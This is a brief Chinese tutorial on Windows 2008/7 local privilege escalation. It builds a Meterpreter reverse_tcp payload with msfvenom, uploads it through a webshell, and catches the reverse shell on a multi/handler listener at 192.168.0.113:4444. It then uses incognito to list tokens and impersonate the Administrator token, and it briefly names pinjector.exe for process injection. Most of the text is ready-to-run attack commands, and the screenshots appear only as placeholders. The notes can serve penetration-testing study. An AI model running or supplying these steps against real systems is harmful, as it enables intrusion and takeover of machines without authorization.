令牌窃取(Windows2008年以后的就没用了)(本地权限)

Windows2008&7令牌窃取提升-本地

  1. 使用Msfvenom生成木马…并通过WebShell上传至目标服务器…

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.113 lport=4444 -f exe >shell.exe
image.png

  1. 在MSF进行监听….

    1. use exploit/multi/handler
    2. set payload windows/meterpreter/reverse_tcp
    3. set lhost 192.168.0.113
    4. set lport 4444
    5. exploit

    image.png

  2. 运行木马,获取反弹的Meterpreter Shell…

image.png
image.png

  1. 使用命令假冒令牌进行提权
    1. use incognito #进入incognito模块
    2. list_tokens -u #列出令牌
    3. impersonate_token 'TEST\Administrator(具体令牌)'

    进程注入(很老的技术了,应用面不是很广)

    适用于Windows2008之前的版本(不包括Windows 2008)
    直接用工具(pinjector.exe)使用的